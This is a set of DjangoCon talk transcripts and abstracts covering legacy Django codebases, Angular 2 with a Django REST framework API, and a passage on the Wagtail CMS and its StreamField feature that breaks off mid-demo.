And overspecification is not an issue in your project so much as in the dependencies, where dependencies have over-specified version compatibility and you're screwed. Because you get version support mismatches. So here's a diagram of what versions look like. I don't know if you guys know this, but this is what they look like. So here we have, the bottom is going to be the lowest version of Django that the teal packages are compatible with, and the top is the uppermost — whether or not these are specified, by the way; this is just what we actually have. And the orange is the current Django version. And now you upgrade and now you have this. You have packages that have not been updated. You have packages that have been updated and they're like, you know what, we're not supporting that version anymore. And this is the problem you're going to have. So you have to solve this, right? That's why we're here. It's for solutions. The first solution is what I call patch and thread. Where, you know, there's an upstream and it's on PyPI. And you know what, I'm going to be helpful. I'm going to, you know, patch this, make it work with the next version of Django. And then you have a pull request, and within a couple of hours this is going to be up on PyPI and we'll be good to go. That's how it works. If anyone's done any work on a project like that — you know, it's the weekend, you have stuff to do, you don't want to do that. Or maybe you don't care about the package anymore as the maintainer. So this is not a bad strategy to take, but it should not be your first strategy. It should be like a secondary one. Another strategy is to fork. Now, this could be forking it as another published project. It could be forking to a private index. Or it could be forking and using your fork's version from Git, you know, or Mercurial or Perforce. I don't know if you guys use Perforce. But you can do that. And you can also kind of vendor it and have a vendored fork where you've actually just added the code to your code base and work on it from there. Related to that, you could just extract what you need. You might just be using one or two modules and it's this huge app — you know, it's got models, it doesn't even have South migrations — and there's all this other crap. And you're like, I just need this template tag library. I just need this. And I actually don't even need to change anything because there's nothing in there that's incompatible with the version of Django I've got. So you can just pull that out as a separate app, you know, vendor it, and you're good to go. Ideally with tests — but you didn't hear that from me — you just include it. And of course you can just remove and replace. So you just say, you know what, we don't need this dependency anymore. We can make do with something here, or we can find an actively maintained alternative. Some of the tools you might use for working with dependencies here are pur and pip-tools. The reason I like pur — and you'll forgive me, this is the example from the pur site, I know it's not Django — is you basically point it to a requirements file and it will look at your requirements and read them. It'll update the requirements file in place with updated versions. This is good for just kind of testing to see what works. You just upgrade everything and say, great, let's see what breaks. So that's your dependencies. And there are some other issues you're going to find in the code base. I'd be remiss if we didn't talk about formatting.
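The pur workflow just described boils down to something like this sketch (adjust the file name to your project):

    # Point pur at a requirements file; it rewrites the pinned versions in
    # place to the latest releases on PyPI, then you rerun your tests (or the
    # tox environments above) to see what breaks.
    pip install pur
    pur -r requirements.txt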
There are stickers — I'll have more stickers later too. This is not a Django specific issue. It's not even Python specific, although since we have a standard, use it. If you guys saw the talk on readability, you understand there's a readability issue. I think a lot of the bad formatting you'll see can hide bugs. And so that's why it's an issue. It's not just an aesthetic issue. There are a few tools you can work with here. autopep8 will automatically format your Python. Again, we can do some formatting. I am cautious about doing too much formatting like this when there aren't tests in place. It should be kosher, but you want to be very cautious. Another is settings, and really the issue with settings is not just gnarly settings, but secrets. Has anyone here ever — actually, don't raise your hand if you've ever committed a secret to a repo. Keep your hands down if you have. It happens; sometimes that's just the way it was written. So you really want to get these out. It's one of those first changes you make — maybe along with logging — get this stuff out. There's a tool for that called Bandit. It's a Python tool. It's part of the OpenStack project. And it will look for security vulnerabilities in code. It's just going to build an AST and do this. And it'll look for stuff like that. It's not 100%, but it'll give you some good signal. The other is just having one big app. You have this monolithic app, and you've got like 50 models, and a URL configuration that's got — I mean, it's just huge, and you can't understand what's going on. The solution is pretty simple. You break this up. The way you start with this, though, I think is with the simplest things — you know, URLs and views. You can do models too, but save those for last. And the way you move models is you use the db_table attribute in the Meta class and just define the table name — you keep the table name where it is — and then a little bit of migrations dancing, maybe some squashing and faking. You don't change the database, but you make Django think you've moved stuff around, and that will work. Now, similar to this is big views. Lots of logic in views. This is hard to test. It's hard to read through. There are a few solutions to this. And this is kind of funny: there was a blog post in 2006 by Jamis Buck about this in Rails. So we've known about this issue. Fat models is kind of one of the solutions to this, putting a lot of the logic on the model itself. I'm a fan of humongous managers. If you guys saw the managers talk, hopefully it persuaded you of this. There's a lot of logic you can put in managers that might be in your views, and it's just a much better place for it. It's much easier to test there. And we could say expansive forms as well. Specifically, if you saw the forms talk, you can do a lot of interesting validation there. And there's a lot, I think, that can be pushed to form validation out of views. It's not just views. Does anyone here use any management commands? Yeah. They're an interface. Views are an interface. Those are an interface. They should have comparable levels of logic in them. So management commands should really just take input from the command line, and then call out to another function or a manager somewhere else to pull the data in. If you're doing, like, CSV munging in the command class, you're probably doing it wrong. And in the end, we want to make as few changes as we can, kind of sequentially. Refactor as you go.
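To make the db_table trick and the "humongous manager" idea concrete, here is a minimal sketch — the app, model, and table names are hypothetical:

    from django.db import models
    from django.utils import timezone

    class InvoiceManager(models.Manager):
        def overdue(self):
            # Query logic pulled out of a fat view so it can be tested directly.
            return self.filter(paid=False, due_date__lt=timezone.now().date())

    class Invoice(models.Model):
        # Moved out of the old monolithic "core" app into a new "billing" app;
        # keeping the original table name means no schema change, just the
        # migration squashing and faking described above.
        number = models.CharField(max_length=20)
        paid = models.BooleanField(default=False)
        due_date = models.DateField()

        objects = InvoiceManager()

        class Meta:
            db_table = "core_invoice"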
You don't have to change everything. You have a new feature? You can put that in a new app. If you're using some old code and making some modifications there, refactor that class or that module. And real quickly, just a few items that we didn't talk about. These all matter a little bit, some more than others. They're going to help a lot when you're starting out and trying to get some of these changes out. But in the interest of time, I'll leave it there. We do have a few minutes if anyone has a question. Hi. I use PyCharm. And how do I use PyCharm to do code reviews? Well, so the thing I would use there is really for formatting the code and for reading through it. So yeah, and optimizing imports. And it'll show you, too — I don't know what you need to have configured, but it can show you a lot of hints about, like, where something's going on. You see the little red or yellow or something else like that: there's an issue. Great talk. Okay, so, and this is directly from experience with the kind of legacy app that you're talking about. When you talk about having large managers, small views, I get that, I appreciate that. I run into situations though where there is way too much cross dependency between models. You have huge managers with logic that isn't really related to itself. Yep. Where do you start with that? I mean, I know that's part of the refactoring part of it. But I mean, it's one of those — if you want to keep traffic crossing the bridge, so to speak. And this tends to accompany most of what you were talking about, like with a test suite that is kind of present, but a lot of it fails. So, I don't know, just what are your comments on that? So, I think one of the first things you do is just refactor the view. So you're just taking that stuff out and putting it into a separate function or a separate method; that can be the first step. Rather than putting it into a manager or a model right away, I tend to use a lot of just module-level functions. Yeah, so do we. And this is where the logic wasn't in the manager — it should have been in different models or different apps. Gotcha. I've also used module-level functions that managers reference. Yeah. Rather than — because I find those easier to test. So, last question. Yeah, one short question. You mentioned refactoring. How should I explain to my customers that refactoring is valuable? That's a really good question. Your customer could be a client, could be a manager, your boss. I mean, it depends on the person. For one, I like to use some physical examples and say it's basically like having a messy job site. You're going to have injuries. You need to be able to see what's going on, and it's really difficult to do that. You could also — I'm sure there are some stats out there — say, look, I read it in this book. Just point to a book they're never going to read. But it's like a 20% likelihood of errors, and that's going to go on. You really have to focus on what they're concerned about, which is speed of delivery and bugs, usually. And so you can say, look, this makes it really hard to work on this. We're spending a little time up front to do it. Customers are probably used to hearing that too. But say, look, there are some bugs. And if you can point to issues that would have been easier to find, let's say, in better-written code, then that can be kind of your starting point. I don't have a great answer for that, for sure. All right. So it's time for lunch, everyone.
And real quick — I have more — there are some "I love PEP 8" stickers up front. And I have more if you want one. And I'll tweet out if you want a shirt. Bye.
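As a footnote to the Q&A answer about refactoring fat views, a minimal sketch of pulling logic into a plain module-level function first — all names here are hypothetical:

    from django.shortcuts import render

    from .models import OrderItem  # hypothetical model in this example app

    def calculate_totals(items):
        # Business logic that used to live inline in the view; now it can be
        # unit tested without the request/response machinery, and later moved
        # onto a manager or model if that makes sense.
        subtotal = sum(item.price * item.quantity for item in items)
        tax = subtotal * 0.06
        return {"subtotal": subtotal, "tax": tax, "total": subtotal + tax}

    def order_summary(request, order_id):
        items = OrderItem.objects.filter(order_id=order_id)
        return render(request, "orders/summary.html", calculate_totals(items))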
|
Legacy software is software that already exists. It may be a project you've inherited after joining a team, a new client's application, or something you wrote last year, or last month. Most software developers seem to prefer "greenfield" development, where you get to start from a clean slate. The reality is that there's a lot of "brownfield" development out there, that it rarely makes sense to throw away working software, and we can control the experience quite a bit to make our lives, and the software, better. If you haven't worked with legacy software chances are pretty good you will. We'll first walk through what "legacy" means, and what this looks like specifically for Django developers and Django projects. We'll also cover some of the scenarios in which you may find yourself working with legacy codebases. This includes the types of issues you'll be presented with, both generally and specific to Django. What do we mean by legacy code? What does a legacy Django project look like? What kinds of issues will you need to deal with? How to approach the codebase Tools for working with your new legacy codebase Introducing or fixing tests Common issues to look for and how to solve them Legacy deployment processes and other scary nightmares More features! Balancing business needs and "perfect" code Deciding when to upgrade Django and other dependency versions, and how to do this
|
10.5446/32731 (DOI)
|
Come on, y'all! MUSIC Thank you for the warm welcome. It's nice to be at DjangoCon. I'm Pam Selle. You can find me on the internet as pamasaur, and at my also-dinosaur-related blog, thewebivore.com. I'm from Philadelphia. I'm also a Google Developer Expert in web technology, and currently a software engineering lead at IOpipe. So let's talk about what's going on with Angular 2. Let's just get right into it. I'm going to presume that you've heard of Angular as a major web framework, and what we're going to be talking about today is Angular 2, which is the next awesome version of Angular. If you want to find out more about it, it's at angular.io. And it's quite different from Angular 1, so we're going to talk about that today. So, the path from Angular 1 to 2: it was blogged about in March 2014, with some stated goals, to be more modular, to support the newest versions of JavaScript (at the time that was ECMAScript 6), simplified dependency injection, easier templating, and simplified directives, which have been a point of confusion in the Angular world. And the beta for Angular 2 was released in December 2015. Looking back on that now, it feels like not that long. It felt like a long time watching that design process, especially with all the promise of how awesome Angular 2 was going to be; there was definitely a lot of anticipation about the framework. So what makes Angular 2 so special? There are three things I'm going to talk about today, and after that we're going to talk about how Angular 2 will play in a Django environment. First, building for any deployment target. This is really awesome: Angular 2 is not tied to the DOM. The document object model is the API we get to control the page on the client. Angular 2 doesn't have to be tied to the concept of a DOM, whereas Angular 1 has this limitation. So if you want to use Angular 1 somewhere, wherever you want to use it needs to understand some kind of document object model. Not so in Angular 2. That's actually really awesome, because it means you can run it in places that don't have a browser, that aren't a browser environment. So anywhere you can bring web technology, which is actually a lot of places, you can take Angular 2. Kind of the biggest example of this is being able to use NativeScript, which is an open source, cross-platform framework for deploying mobile apps. You can use Angular 2 and NativeScript so you could actually share code across your web and mobile apps. So that's pretty awesome. Angular 2 is architected with components, which we'll talk about in a minute, and that makes code reuse really accessible, which is always a big dream in web development. Second, choose your own language. Whereas Angular 1 is a JavaScript framework, Angular 2 is kind of an "as long as it compiles to JavaScript" framework, with an especially big focus on TypeScript. This is actually the drop-down in the Angular docs: you've got TypeScript, JavaScript, or Dart, which is a language championed by Google. But let's talk about TypeScript for a minute. TypeScript is a project championed by Microsoft. It's a superset of JavaScript providing, among other things, optional static typing. I know, I'm at a conference, let's talk about types. Types are really awesome; I really like those. They're nice to have when you can get them. So you get types with TypeScript, totally optional.
You don't have to annotate types, and if you do want to annotate, you can always punt and say any. But with TypeScript you can also compile the newest JavaScript standards down to older environments, which means you get features like modules, lambdas, classes, the spread operator, for...of, stuff like that from the newer versions of JavaScript, and the TypeScript compiler does all the work for you to compile that to run in another environment. So you can just focus on writing beautiful TypeScript code and not on whether the browser you're going to deploy to supports it. The other thing is that part of the design of TypeScript is that JavaScript ES5 is valid TypeScript code. If you're familiar with Sass, it kind of follows that model: all you do is change the end of the file name from .js to .ts, and ta-da, it's a TypeScript file. That way you can migrate gradually to TypeScript if you so choose, if you're in a migration-type situation. So the big question is always: do I have to use TypeScript to use Angular 2? Well, no. You saw in the drop-down that there are multiple options, and as long as something can interface with JavaScript, it could probably interface with Angular 2, so use what you want. But it's pretty awesome to use TypeScript, it's pretty fun. Also, the best documentation for Angular 2 is in TypeScript; even though they have the other options, the best documentation is in TypeScript, so it doesn't make a lot of sense not to use it. There's good IDE support if you use an IDE, and even Sublime Text has great TypeScript support. All right, let's talk about web components. Before I talk about Angular 2, I'm going to talk about what web components are, just as a quick review. A web component consists of three parts: you have markup, behavior, and presentation. Together, they form a beautiful package of a web component. So let me introduce you to a web component that you're probably familiar with. This is a select tag. It has markup, it has presentation, and it has an API; you know how to get the value out of a select tag. So where else does something like the select tag exist? Every time you wanted to do something like a select tag, you had to write a separate HTML file, write a separate JavaScript file, wire them all together, and then there's a million plugins for it. You can think of components like this; we build these all the time, like carousels or menus, stuff like that. And so the idea with web components is that you don't have to champion these things to become native, like the select tag, which is native. You can write your own web component and then share it with all your friends, and have lots of fun. Web components are really awesome. They're definitely the direction the web is going in. In fact, the idea of web components actually refers to a set of APIs, and these are the APIs it refers to: custom elements, HTML imports, templates, and the Shadow DOM. Many of these might sound familiar; some of them might be new. But the thing that's interesting, slash not so fun, about them is that browser support is not across the board. So in order to use the web components APIs, you need a polyfill, and then you probably want to use something on top of that polyfill, like Polymer or X-Tag.
However, these polyfills aren't super performant. So the direction is web components, basically the direction is web components, but should you use web components right now? Probably not. You should be aware of them. So this is where we get to Angular 2. One of your best bets for using something like web components is using something like Angular 2, which has the idea of components and actually plans for them to be forward-compatible with the web components specification. So that's pretty awesome: you can just use something that actually works and that's really performant, because that was a priority in Angular 2 (remember, we want to be super performant, super fast), and you still get to be aware of this new thing coming forward. If you want to learn more about web components, webcomponents.org is definitely the place to learn about them, kind of like the homepage for all things web components. So let's talk about components in Angular 2 and what they look like. Here's a TypeScript web component. If you write vanilla JavaScript and you haven't written TypeScript, it looks a little weird; however, it looks pretty similar to ES6 or ES2015-type stuff. You've got a class keyword in there, and you have a component there. In Angular it's considered an annotation, but you can probably think of it like a decorator: it adds metadata about the code, is what it does. And so our component annotation says we want to target a particular selector, say-hello, and we're going to do some data binding. You can see a type annotation there: that name is a string. So this is a super simple hello world component. You write the same thing in ES5, and it looks like this, which isn't so different. It's using the same DSL, the same domain-specific language, which is nice. So once you know the Angular 2 way of doing things, you can kind of bounce between them if you want to. And so on: no type annotations, just plain old JavaScript functions, plain old JavaScript objects. Let's talk about directives. In Angular 1, you did a lot of things with directives. If you ever developed an Angular 1 project, to me it felt like if there was a question, the answer was a directive, much of the time. If it wasn't related to fetching data, then that's a service; but if you want to modify presentation, if you want to create a new element, it's also a directive. So everything is a directive, basically. And so, what was a directive anyway? In Angular 2, this is a directive in action: ngIf. It looks a little different in Angular 2. You have a little asterisk there, which is actually a nice way of showing you that the directive is going to change what is going to be output in the presentation. It also helps Angular 2 break out the code when it's doing its parsing, so it actually does serve a really nice purpose for them, too. If ngIf is true, then it will display this link; if it's false, it won't display the link. Pretty straightforward. So that's a directive: it's a thing that you're going to put on your HTML to modify what's going to happen in your application. So you keep directives, we just saw a directive in Angular 2, but they go in components.
So, this is probably my favorite thing about Angular 2: if you are not familiar with Angular 1 and you're coming to this, I would say just go forth into the land of Angular 2 and don't confuse yourself with Angular 1, because it's quite different. And to me, wrapping my head around components, which are markup, behavior, and presentation, is a lot easier than trying to figure out what a directive is. So you can keep directives, which are annotations on your HTML, but they go in components. So here's an example of a component with a directive, which is something super important: it checks whether it's July 2016, and if so, it will say hello, DjangoCon. I was going to try and scroll it right, but you can believe me that it says 2016, and we'll also see it in the example app, so it does say hello, DjangoCon. All right. I think I'm going to talk about Angular and Django now. I'm giving an Angular talk at a Django conference, but we're also talking about web technology in general. The beauty is that Django, and certain things in the Django ecosystem, make it really easy to write your API once and use it everywhere. You write an API, you consume it in this app, you consume it in that app; hey, APIs, that's what they're for. So you can write your API in Django and then consume it with your Angular 2 app. That's probably the best way to use Angular 2 in the Django ecosystem. I would not recommend doing something like a Franken-setup where you serve some things from the server and some things with Angular; you kind of want to go in one direction or the other. If you want to do some server rendering, that's a different thing too, but that's also a different talk. So, if you're going to write an API, the common ways to do this in the Django world would be with the Django REST framework (did some of you do the Django REST framework tutorial? Yeah. Nice. It's a really cool framework, so I'll show it, and then the rest of you will be like, why don't I go do the tutorial?) and TastyPie, which also makes it really easy to make APIs. So, Django REST framework: powerful and flexible, web-browsable API, other awesomeness; go do the Django REST framework tutorial and learn all about it. So, let's actually look at that. I believe it's time for that now. Our API is Dinosaurs as a Service, which is a super important service the world needs today. If you want to talk about funding, you can talk to me afterward. So, let's look at that API. To get this started (let me make this bigger, sure, thank you), this UI is pretty much all from Django REST framework. I did the configuring and stuff: I made a model, put some data in the model, did the Django thing. But most of it is this beautiful UI. It's browsable, it's all the Django REST framework. So, if I click on my dinosaur endpoint, which is cool that I can click on it, that's really awesome, I see my dinosaurs. I want to ask you to suggest a dinosaur, but you have to suggest one that I can spell. No? Okay. How cool is that? It just does this. It's Django REST framework, it just works. Love it. So, we just add in T-Rex, and if we go back and look at our dinosaurs, we have T-Rex. So, this is running on localhost 8000, and then I have our Angular 2 app running up here. You see, we actually have the DjangoCon directive running and saying yes, it's July 2016, so it's DjangoCon.
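For readers following along, here is a rough sketch of the kind of Django REST framework setup being demoed. The Dinosaur model, its fields, and the URL prefix are assumptions for illustration, not the speaker's actual example code (normally this would be split across models.py, serializers.py, views.py, and urls.py).

    from django.db import models
    from rest_framework import routers, serializers, viewsets

    class Dinosaur(models.Model):
        name = models.CharField(max_length=100)

    class DinosaurSerializer(serializers.ModelSerializer):
        class Meta:
            model = Dinosaur
            fields = ("id", "name")

    class DinosaurViewSet(viewsets.ModelViewSet):
        # ModelViewSet provides list/create/retrieve/update/delete,
        # plus the browsable HTML API shown in the demo.
        queryset = Dinosaur.objects.all()
        serializer_class = DinosaurSerializer

    router = routers.DefaultRouter()
    router.register(r"dinosaurs", DinosaurViewSet)

    urlpatterns = router.urls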
And we see our dinosaurs listed out here. So, it's interacting with the API to present this in our simple application. And all this code is available online if you want to see the example later. So, don't you need to refresh to see the T-Rex? Or is that a different thing? Good question. The question was, do I need to refresh to see the T-Rex? Yes; I have it set up with live reload for code changes, but yes. There would be ways for you to not have to, though. An awesome thing about Angular 2, which I didn't put in here but is generally awesome, is that the way you get your data by default is through observables and not promises. A promise in JavaScript is like: go and get me some data, let me know when you're done, and then here's some data. An observable is more like: go get me some data, and then give me data as you have it. And that's pretty awesome. So we could set up a web socket, something like that, and send an event; there's a bunch of ways we could do that in order to get the T-Rex once it was added, live. So, here's some of the Angular 2 code, and this is all going to be in TypeScript; the example code is in TypeScript. This is a big wall of text, so let's instead look at a little bit less of it. This is the important bit of the getDinos service. Services in Angular 2: if you have a data source and you want to tap that data source, so to speak, you're going to use a service. It makes sense; just go with it, or it will eventually. So, you have a service, and then you have a little getDinos method, and it uses the HTTP service to get this API. This actually turns it into a promise, and just uses promises to keep things more promise-like and not observable. And then it just throws the data at the component that's consuming the service. But you're going to run into this problem, and that is CORS, cross-origin requests. It's not that bad, though, because we're working in Django, and there's a Django package: you install it, you add it to the middleware, and ta-da, you have a CORS policy. It's pretty awesome. One of those nice benefits of being able to build your API quickly in Django: you run into a little problem, there's a Django package to fix your problem. What's that for JavaScript? So, let's look at the dinosaur component. If our service is where we're going to get our data, then our component is going to be the thing that actually displays on the page. So it has, to beat it to death, the presentation, the markup, the behavior. This is the annotation that is on our dinosaur component: its selector is dinosaurs, and then there's a little template, and you'll notice that the template has a directive, an ngFor, and it just says let dino of dinos, where dinos is that set of dinosaurs we get as a response from the API, and then it just displays each of these in an unordered list. And this is the rest of the component, the JavaScript part; those are both in the same file, but just broken out to make it a little bit easier to read. It implements OnInit because when the component boots, we want it to make a request to our service. And so on init, we say we want you to go get dinos.
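The Django package being referred to here is django-cors-headers; a hedged sketch of the wiring follows. Setting names have shifted between versions (older releases used CORS_ORIGIN_WHITELIST, and older Django used MIDDLEWARE_CLASSES), and the allowed origin below is just a placeholder for wherever the Angular app is served from.

    # settings.py
    INSTALLED_APPS = [
        # ...
        "corsheaders",
        "rest_framework",
    ]

    MIDDLEWARE = [
        "corsheaders.middleware.CorsMiddleware",  # place it high, before CommonMiddleware
        "django.middleware.common.CommonMiddleware",
        # ...
    ]

    # Let the Angular dev server (on a different origin) call the Django API.
    CORS_ALLOWED_ORIGINS = [
        "http://localhost:3000",
    ]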
And since getDinos returns a promise, we get to use then and catch and set our dinos, and, for those keeping score, this is where the type system is punting: I made dinos a type of any, though really it's an array of objects, and the error is any. So this is the bit in the dinosaur component where we see dependency injection in action, which is pretty nice. Instead of saying dinosaurService equals new DinosaurService, which would be one JavaScript way of saying this, dependency injection says: in the constructor, we're passing private dinosaurService, which is a DinosaurService. In the type annotation, this kind of makes sense. We're getting the dinosaur service because the capital-D DinosaurService is what we brought in, and then lowercase dinosaurService is what we're actually using in our component. And then onInit is that boot process where we get dinos on the component's initialization. There's also component teardown (there's a hook for that) in case you need to tear down components when they're destroyed. So, the example app is at Django REST Angular 2 example; I'll tweet it so that you don't have to memorize it. And all these slides are available at pselle.github.io slash Angular 2 and You. So, thank you very much. If you want to get in touch with me: pamasaur, thewebivore. I also have a podcast with some friends called Turing Incomplete; if you get the joke, you'll like the podcast. And thank you so much. Thank you. So, this is the SystemJS setup. That's just what I use, and it consumes these things, along with the systemjs.config. One of the reasons why: if you look at the index, and then the systemjs.config looks like this, that's kind of gnarly, so I kind of let them handle that, and then it works. So. Yeah.
|
AngularJS is one of, if not the, most popular JavaScript framework out there today. But a new day is coming: The dawn of Angular 2! Angular comes with a robust community and standard of practice, but Angular 2 is something even more intriguing: a JavaScript framework based on components (not unlike React!), with an eye towards complying with future web standards. In this talk, we’ll cover the broad strokes of Angular 2, including some of the big game changers: web components and “choose your own language” support, and how it integrates into back-ends like Django to provide some structure to your front-end. You'll learn about Angular 2's approach to the "JavaScript framework" problem, how components create modularity in your application, and a little bit about the JavaScript build toolchain (mysterious to many!) that the JavaScript world is constantly debating over.
|
10.5446/32732 (DOI)
|
Come on, y'all! MUSIC Thanks for coming to listen to me talk and, you know, sticking with us to the end of all the talks. And thanks to Torchbox for making Wagtail. It's a wonderful piece of technology, and it's the reason why I'm standing here. So, show of hands, who knows what Wagtail is? Other than what Vincent just said. OK, that's great; that's actually a lot more than I thought it would be. So for those of you that don't know, Wagtail is a pretty new open source Django CMS created by Torchbox, and it basically provides the groundwork to build your own CMS. And that's in quotes, because it gives you a lot of things that you would expect from a regular CMS: things like a great admin, the ability to have a publishing system, really anything like a way to manage documents, images, things like that. But I like to think of Wagtail as something that's made for the developer, the designer, and the content editor. There are a lot of CMSs out there that really only focus on either the development side or the editing side, but I find that Wagtail does a really good job of combining all of these components that really should be relevant in a CMS. So why should you use it? It's really customizable. I've extended the framework, well, the CMS, on numerous occasions, doing weird things, and it's really held fast. It's really not a big deal to extend even some of the most crucial components. In fact, on my last project, I extended the publishing workflow to add a staging state: normally you'd have a draft state and then it's published, and I added a staging state to that entire workflow. And that didn't interrupt anything about the other components of Wagtail; there weren't any weird things I needed to take care of. It was really easy in that way. And it's got some really great features. Unfortunately, I can't talk about all of them or even most of them. Actually, there was another talk at this conference about Django forms, in which you think about forms as data and build them dynamically instead of in the static way we normally would, and Wagtail does use some of this. That's just part of what Wagtail offers; there are a lot of great things. And it gets out of your way. Everybody always likes to talk about how developers are lazy, right? We want everything done for us. We don't want to do anything; we just want to write the import. We don't want to write the thing, we just want to be able to use it. And I think Wagtail does this as well: it gets out of your way, but then it provides all these features that you'd like. So yeah, we're lazy, we want to be lazy, we don't want to do anything, but we also want it to provide us with the things that we want. So we want it to get out of our way and just let us do what we want to do, but also provide the features that we want. It's also got Jinja2-compatible templating as well as Django templates; normally you'd probably use Django templates unless you had some reason not to. It's got built-in Elasticsearch integration. There's a bit of setup you have to do to achieve a really good workflow, or really good search capabilities, with this, but it's really not much. And if you've never heard of or used Elasticsearch, I definitely recommend it. It's a really great search engine; well, it's more than that. And it's easy to integrate in existing projects.
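As a rough illustration of that Elasticsearch setup, the search backend is pointed at an Elasticsearch instance in settings. The backend module path depends on the Wagtail and Elasticsearch versions in use (Wagtail 1.x used wagtail.wagtailsearch.backends.elasticsearch), so treat this as a sketch rather than a drop-in config.

    # settings.py
    WAGTAILSEARCH_BACKENDS = {
        "default": {
            "BACKEND": "wagtail.search.backends.elasticsearch7",
            "URLS": ["http://localhost:9200"],
            "INDEX": "wagtail",
            "AUTO_UPDATE": True,  # keep the index in sync as pages are edited
        }
    }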
It's not really something that works on top of Django; it's more beside it. You put it in your installed apps and you're able to create your own sort of CMS, and I'll explain the ways you can create content types later. It's not going to interfere with any of your other Django apps. You could really have only a blog that's powered by Wagtail; you don't have to have one project that's entirely powered by Wagtail, it's not like that at all. And it lets Django be Django. This is a really important thing. I think the Mezzanine talk mentioned this too; I haven't had so much experience with Mezzanine, but I found that Wagtail does this very well. So, some caveats to how great Wagtail is. It's not exactly your normal Django flow, which is a bit contradictory, I realize, in the way that you think about how things get served. You think of the way a request comes in, it goes through the normal path, and you end up in this views.py where you're returning a result. I don't know if this is a bad thing or a good thing (I think it's pretty good), but Wagtail has a generic serve view which calls the class that you created to render the web page. It gets the context, packages it all up, and then through that generic serve function, that view function, it will give you the web page. So you don't have to do anything: you could have an entire Wagtail project, an entire site, without ever touching a views.py. Also, the documentation is pretty good, but it could be a lot better. I found myself coming across things, at least when I started, that were fairly easy to understand but took a long time to actually get to that understanding, just because it wasn't in the documentation. And then there are a couple of admin quirks, but I hear really good things about them being updated. So let's just talk about some features real quick. The Page model is basically the bread and butter of how this is going to work, and like I said before, it's got this built-in publishing workflow. And I guess I should back up a little bit: the Page model is a Django model. They add a bunch of really awesome functionality to it, and when you want to create your content type, it's something that you inherit from Page, which you can see in code. It handles all the relationships between different pages: is it a child page of a parent page, can you get the children of this page, the ancestors or the descendants? It's a really useful feature, and that's actually something they achieve through a different package called Treebeard. I don't really know exactly what the relationship is there, but you can look into that on your own. It handles other things like moving a page from one parent to another, copying the page, scheduling publishing, so you're not having your content editors wake up at midnight just to publish some press release. And it's got automatic Wagtail admin registration, and I just want to underline Wagtail admin, because it's not something that you're automatically registering in your Django admin. So, this is an example of all you need to create a page type, a content type that you could add to your site and visit as a web page.
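That slide would contain something roughly like the following. This is a sketch rather than the speaker's exact code, with import paths as in Wagtail 2.x (Wagtail 1.x used wagtail.wagtailcore and wagtail.wagtailadmin, and later releases moved these modules again).

    from django.db import models
    from wagtail.core.models import Page
    from wagtail.core.fields import RichTextField
    from wagtail.admin.edit_handlers import FieldPanel

    class BlogPage(Page):
        date = models.DateField("Post date")   # a plain Django model field
        body = RichTextField(blank=True)       # Wagtail's WYSIWYG field

        # content_panels controls what editors see for this page type in the admin.
        content_panels = Page.content_panels + [
            FieldPanel("date"),
            FieldPanel("body"),
        ]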
So you go into your models.py, or wherever you're going to put this model, inherit from Page, and then you can add even a plain Django model field, a date field, and then their own built-in RichTextField, which is really just a WYSIWYG editor. And then, in order to show these in the actual view that you're going to see, you just declare these content panels, which is just a list of field panels, and it will go and detect what type of field you're using and render that appropriately. So StreamField is really the big win. In my opinion, this was the thing that most attracted me to Wagtail. And it's (to be clear, I don't work for Torchbox, by the way, I just really love StreamField, I really like Wagtail) creative, intuitive, everything I say up there. And Matthew Westcott has written a really cool blog post that plays on this theme of the Henry Ford saying (I think I'm paraphrasing, it's not the exact quote), something like: if I had asked them what they wanted, they'd have said faster horses. And now we've got cars. So this is the type of thing that we're talking about when I say a rich text field or WYSIWYG replacement: instead of this blob of HTML, we're working with JSON. And in order to create these JSON objects, we're going to be implementing these things called blocks, which are classes that manage all this data and create these nice structured blocks of content within the StreamField. And StreamField, if it's a little bit confusing, and I'll dive more into it, is really just a text field saved in the database. So instead of a blob of HTML where it could be completely unknown what's inside, now we know exactly how to access all of the individual components, because it's all formatted JSON. And so this would be an example of a block, which I referred to earlier, something that could manage that JSON content. We're inheriting from a couple of things, but really what's important to understand is that blocks.StructBlock, which is what we're inheriting from here, is just a way to combine different blocks. And a block you can think of as kind of like a field, like a model field, even though it's not something that's actually getting directly saved to the database; the only thing that's saved to the database is that text field when you're declaring the StreamField. And you can see that we've done other things here too, like in the Meta class we've set things like icon equals wagtail and template equals example_block.html. That's how you're going to see it in the admin and how it's going to be rendered on the front end, and we'll explain more about that. So on the actual page, this is what StreamField is going to look like. You've got your StreamField, which again is just that text field of formatted JSON, and you pass in an argument which is a list of tuples. Each tuple has a string, which is the type of block that you're working with, and then the actual block class which is going to be manipulating that data. And so in order to really demonstrate it, and I know I might be harping on it too much, but it took me a while to understand this. My password is foobar, so. So here, this is the Wagtail admin. And you can already kind of tell that this is something that's derivative of other CMSs that you've seen, but to me it looks a lot better, a lot more streamlined.
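A hedged sketch of the block and StreamField declarations being described: the block names, icon, and template path are placeholders, and the import paths again follow Wagtail 2.x conventions.

    from wagtail.core import blocks
    from wagtail.core.fields import StreamField
    from wagtail.core.models import Page
    from wagtail.admin.edit_handlers import StreamFieldPanel

    class ExampleBlock(blocks.StructBlock):
        # StructBlock combines other blocks into one structured chunk of JSON.
        heading = blocks.CharBlock()
        body = blocks.RichTextBlock()

        class Meta:
            icon = "placeholder"                    # icon shown in the admin block chooser
            template = "blocks/example_block.html"  # how the block renders on the front end

    class ContentPage(Page):
        # StreamField stores an ordered list of typed blocks as JSON in a text column.
        body = StreamField([
            ("heading", blocks.CharBlock()),
            ("paragraph", blocks.RichTextBlock()),
            ("example", ExampleBlock()),
        ])

        content_panels = Page.content_panels + [
            StreamFieldPanel("body"),
        ]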
And here are some other features that I couldn't talk about, things like images and documents. This is where you can go and look and search for those things. Here's a search for all the different pages and content types that you want. Snippets are really just models that you can register in the admin. And then we've got settings: really good controls for adding users, adding groups of users, setting permissions on those groups, setting up redirects, and different cool stuff like that. And then what's really nice, and something that people use all the time, is this Explorer. By the way, this is the Wagtail demo, their demo. I haven't written any of this code at all; nothing here actually maps to the code I'm showing you in the presentation. I just kind of wanted to show everybody that it exists. So we can go to this root page and then to this Atomic Wagtail page that I've created, and we can see that I already have content here; this is the StreamField and this is what it's going to look like in the admin. And you can tell how that icon attribute comes in; that's, I think, the heading icon. And we've got all these different block types that we can select, right? And this is great, right? This is exactly what we want. We want to be able to have a heading here and then just type heading. Why do I always do that? Heading. And then we can have even a rich text field, and sometimes that's appropriate, because sometimes we want to put in a link or something like that. I'm not going to put in the link, sorry. And then we can also do things like preview the page, and this content shows up. And you might be wondering, and I'll explain a little later, why it didn't just show up as plain text. It's really because of that template, but let me explain a 